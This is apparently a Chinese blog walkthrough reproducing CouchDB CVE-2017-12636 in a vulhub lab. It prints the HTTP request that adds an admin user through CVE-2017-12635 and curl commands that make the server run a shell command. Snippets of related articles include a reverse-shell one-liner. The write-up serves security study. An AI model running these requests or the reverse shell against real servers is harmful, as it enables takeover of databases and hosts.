13 - vulhub - Couchdb 任意命令执行漏洞(CVE-2017-12636)

最新推荐文章于 2024-08-06 09:34:24 发布
最新推荐文章于 2024-08-06 09:34:24 发布
阅读量781 收藏 21
点赞数 29
文章标签: couchdb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60721823/article/details/139834996
版权

小于 1.7.0 以及小于 2.1.1

漏洞原理

可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。

CouchDB管理用户可以通过HTTP(S)配置数据库服务器,其中可以启用的配置选项包括操作系统级二进制文件的路径。这允许CouchDB管理员用户以CouchDB用户的身份执行任意shell命令,包括从公共互联网上下载和执行脚本。

漏洞复现

环境准备

Couchdb 2.x和1.x的API接口有一定的区别,所以这个漏洞的利用方式也不同。本环境启动是1.6.0版本,如果你想测试2.1.0版本,可以启动CVE-2017- 12635附带的环境。

靶机环境 139.196.87.102 (vulhub)

攻击机环境 192.168.8.137 (虚拟机 Ubuntu 20、Java1.8、Burp)

启动 Couchdb 垂直权限绕过漏洞 环境

1.进入 vulhub 的 Couchdb 任意命令执行漏洞 路径

cd /usr/local/tools/vulhub/couchdb/CVE-2017-12636

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep vulhub

在这里插入图片描述

启动完成后,访问http://139.196.87.102:5984/浏览Couchdb的欢迎页面。

在这里插入图片描述

漏洞检测

漏洞检测

开发或运维人员检查是否使用了受影响版本范围内的Apache CouchDB,是否配置了强口令和网络访问控制策略。

漏洞利用

该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用 CVE-2017-12635 先增加一个管理员用户。

增加管理用户的数据包如下

PUT /_users/org.couchdb.user:vulhub HTTP/1.1

Host: 139.196.87.102:5984

Accept: /

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 108

{

“type”: “user”,

“name”: “vulhub”,

“roles”: [“_admin”],

“roles”: [],

“password”: “vulhub”

}

在这里插入图片描述

1.7.0 以下的说明

依次执行如下请求即可触发任意命令执行:

curl -X PUT ‘http://vulhub:vulhub@139.196.87.102:5984/_config/query_servers/cmd’ -d ‘“id >/tmp/success”’

curl -X PUT ‘http://vulhub:vulhub@139.196.87.102:5984/vultest’

curl -X PUT ‘http://vulhub:vulhub@139.196.87.102:5984/vultest/vul’ -d ‘{“_id”:“770895a97726d5ca6d70a22173005c7b”}’

curl -X POST ‘http://vulhub:vulhub@139.196.87.102:5984/vultest/_temp_view?limit=10’ -d ‘{“language”:“cmd”,“map”:“”}’ -H ‘Content-Type:application/json’

其中,vulhub:vulhub为管理员账号密码。

第一个请求是添加一个名字为cmd的query_servers,其值为"id >/tmp/success",这就是我们要执行的命令。

第二、三个请求是添加一个数据库和文档,这里添加了一个可以查询的。

第四个请求在这个数据库里进行,因为我将其设置为cmd,这里就是我最初cmd的开始添加的命名的query_servers最后触发命令执行。

在这里插入图片描述

验证漏洞利用是否成功

进入容器查看 /tmp/ 路径下 是否生成 success 文件

在这里插入图片描述

(1)Python所有方向的学习路线(新版)

这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。

最近我才对这些路线做了一下新的更新,知识体系更全面了。

在这里插入图片描述

(2)Python学习视频

包含了Python入门、爬虫、数据分析和web开发的学习视频,总共100多个,虽然没有那么全面,但是对于入门来说是没问题的,学完这些之后,你可以按照我上面的学习路线去网上找其他的知识资源进行进阶。

在这里插入图片描述

(3)100多个练手项目

我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。

在这里插入图片描述

Java老杨
关注
  • 29
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CouchDB未授权访问漏洞记录(端口:5984、6984,CVE-2017-12635,CVE-2017-12636)复现失败
墨痕诉清风的博客
11-23 1220
Apache CouchDB是一个开源数据库,专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部⻔的市场框架,Meebo,用在其社交平台(web和应用程序),默认会在5984端口开放Restful的API接口口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。...
Couchdb 垂直权限绕过漏洞CVE-2017-12635)
一枚不知名的Java程序猿
10-02 971
vulhub漏洞复现学习过程
Couchdb 任意命令执行漏洞CVE-2017-12636)复现
HEAVEN569的博客
06-21 1142
Couchdb 任意命令执行漏洞CVE-2017-12636)复现
CouchDB未授权访问漏洞
最新发布
qq_68186313的博客
08-06 127
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse.用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api1修改couchdb的配置query_.server,这个配置项在设计、执行view的时候将被运行。1、使用以下语句在Fofa上进行资产收集..或开启Vulhub靶场进行操作。
Couchdb 任意命令执行漏洞CVE-2017-12636
weixin_44311721的博客
07-30 1446
Couchdb 任意命令执行漏洞CVE-2017-12636Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的...
vulhubCouchdb 任意命令执行漏洞CVE-2017-12636
qq_45300786的博客
09-14 693
特征 特征请参考我的上一篇帖子 【vulhubCouchdb 垂直权限绕过漏洞CVE-2017-12635)漏洞复现 影响版本:小于 1.7.0 以及 小于 2.1.1 复现 注:复现中的很多东西也要用到这篇帖子,所以先看这篇 【vulhubCouchdb 垂直权限绕过漏洞CVE-2017-12635)漏洞复现 再来看本篇帖子 该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。 本次复现是用的版本1.6 http://192.168.1
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
include_voidmain的博客
07-14 2645
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 382
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
CVE-2017-12635+12636 复现+反弹shell
weixin_45695535的博客
05-08 1477
整体过程漏洞描述一、复现过程环境复现cve-2017-12636反弹shellpython3 exp 反弹shell参考文章 漏洞描述 Apache CouchDB 是一个开源数据库,专注于易用性和成为” 完全拥抱 web 的数据库”。它是一个使用 JSON 作为存储格式,JavaScript 作为查询语言,MapReduce 和 HTTP 作为 API 的 NoSQL 数据库。应用广泛,如 BBC 用在其动态内容展示平台,Credit Suisse 用在其内部的商品部门的市场框架,Meebo,用在其社交
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2024-12636
04-16 840
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。基本上主流的和经典的都有,这里我就不放图了,版权问题,个人看看是没有问题的。
未授权访问:CouchDB 未授权访问漏洞
qq_68163788的博客
05-18 522
Apache CouchDB是一个开源数据库,应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序),默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。 其HTTP Server默认开启时没有进行验证,而且绑定在0.0.0.0,所有用户均可通过API访问导致未授权访问。
Couchdb数据库-命令执行漏洞复现-CVE-2017-12636
apple_52661176的博客
08-31 221
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。0>&1""" #攻击机ip。开启vulfocus靶场环境。在攻击机上开启nc监听。
couchdb 垂直权限绕过漏洞cve-2017-12635)
whatday的专栏
06-08 795
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和Ja
CouchDB任意命令执行CVE-2017-12636
Kevin's Blog
07-26 996
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 攻击过程五、防御措施 一、漏洞原理   CountDB通过RESTful JavaScript Object Notation (JSON) API访问,CouchDB默认在5984开放Restful的API接口,用于数据库管理。由于CouchDB允许用户指定一个二进制程序或脚本,于Cou...
Couchdb 任意命令执行漏洞(CVE-2017-12636)
weixin_46239998的博客
01-01 783
command = rb"""sh -i >& /dev/tcp/192.168.217.128/5566 0>&1""" # 这里的ip为监听机ip也就是攻击机。target = 'http://192.168.217.128:5984' # 目标ip。如上图所示即反弹shell成功!三、构造payload。
CouchDB 未授权访问漏洞总结
qq_45746681的博客
10-05 1197
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、CouchDB 未授权访问漏洞是什么?二、复现1.搭建环境2.漏洞反弹shell的exp防御方法 前言 复现常见的未授权访问漏洞 加强理解 一、CouchDB 未授权访问漏洞是什么? Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值